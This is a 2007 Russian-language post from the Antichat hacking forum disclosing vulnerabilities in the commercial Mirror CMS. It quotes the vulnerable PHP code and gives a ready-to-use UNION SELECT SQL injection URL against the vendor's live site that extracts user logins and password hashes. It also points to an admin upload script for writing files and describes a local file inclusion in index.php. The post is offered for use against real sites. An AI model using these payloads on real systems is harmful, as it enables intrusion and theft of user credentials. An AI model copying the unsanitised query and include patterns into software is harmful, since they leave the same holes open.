ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Mirror CMS bugs
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Mirror CMS bugs
  #1  
Старый 29.10.2007, 15:48
UID: 24441
USER: blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию Mirror CMS bugs
by me)

коммерческая платная цмс, производитель
http://mirrorcms.ru

там же представлены все сайты на это цмс

Код:
$sSQL="SELECT ".$suffx."_page.title  from _page where  _page.id='".$_GET['doc']."'";
Цитата:
select usr_login,usr_password from usertable
Если установлен мод рерайт, то название модуля берем из названия первого каталога ..
Например офф сайт

http://mirrorcms.ru/news/36/

аналогично

http://mirrorcms.ru/?ip=news&doc=36

Код:
http://mirrorcms.ru/?ip=news&doc=-1+union+select+1,2,3,concat(usr_login,char(64),usr_password),5,6,7,8,9+from+usertable/*
md5()


проблема в том что админка при инстале указывается вручную, поэтому стандартно /admin/ встречается на 2-3 сайтах.


Вообще отпадает смысл в скуле, если мы находим админку.. тогда идем в

http://site.com/админка/template/imageload.php

вводим сверху диру где разрешена запись (у меня на 4х сайтах оказалась не просто ?image/ как по дэфолту.. а /stock/images/


и третья уязвиость - локальный инклуд при magic quotes off в index.php

PHP код:
if(file_exists("$ip/docn.php")){
include("$ip/docn.php"); } 
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ActiveX bugs 4nob1oz Уязвимости 0 16.07.2007 14:58
Bots, breaches and bugs plague 2006 Sn@k3 Forum for discussion of ANTICHAT 0 28.12.2006 20:25
Month of Browser Bugs: каждый день по эксплоиту tclover Мировые новости 1 06.07.2006 23:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ